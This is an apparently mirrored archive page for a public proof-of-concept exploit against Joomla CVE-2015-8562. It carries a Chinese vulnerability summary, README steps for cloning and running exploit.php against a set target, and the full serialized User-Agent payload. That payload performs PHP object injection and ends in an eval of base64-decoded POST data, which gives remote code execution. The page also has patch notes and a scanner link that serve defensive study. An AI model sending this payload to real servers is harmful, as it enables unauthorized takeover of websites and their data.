Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-8562 PoC — Joomla! Core 远程代码执行漏洞

Source
https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC
Associated Vulnerability
Title:Joomla! Core 远程代码执行漏洞 (CVE-2015-8562)
Description:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla!中存在安全漏洞。远程攻击者可借助HTTP User-Agent头利用该漏洞实施PHP对象注入攻击,执行任意PHP代码。以下版本受到影响:Joomla! 1.5.x版本,2.x版本,3.4.6之前3.x版本。(在2015年12月广泛利用)
Description
A proof of concept for Joomla's CVE-2015-8562 vulnerability
Readme
# Joomla-CVE-2015-8562-PHP-POC
A proof of concept for Joomla's CVE-2015-8562 vulnerability

![Preview](http://eih.bz/s1/testjfjy.gif)

## Intro

This PoC is a near 1:1 copy of Gary's python implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/38977/).

## Use it

It's very easy to install:

    git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
    cd Joomla-CVE-2015-8562-PHP-POC
    composer install

Once composer has everything installed you'll need to change `$target` in `exploit.php`.

After that you're ready to go:

    php exploit.php

### CVE-2015-8562

In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.

This vulnerability hit *all* versions of Joomla. A patch for v1.5.x, v2.5x and v3.x is already [released](https://github.com/joomla/joomla-cms/releases/tag/3.4.6).

If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine as this exploit also utilises [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219). 

Nikos Verschore from PatrolServer made a very detailed [blog post](https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/) and was a major help at understanding this vulnerability. You can use their [mini-scanner](https://scan.patrolserver.com/joomla/CVE-2015-8562) for free to check if your site is at risk.

#### The real exploit

This is what the sent `User-Agent` header looks like:
```
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
```
File Snapshot

 [4.0K]  /data/pocs/70c0872880a9b0dee9391cacaad4791f0cf7f061
├── [ 333]  composer.json
├── [1.5K]  exploit.php
├── [1.1K]  LICENSE
└── [2.1K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.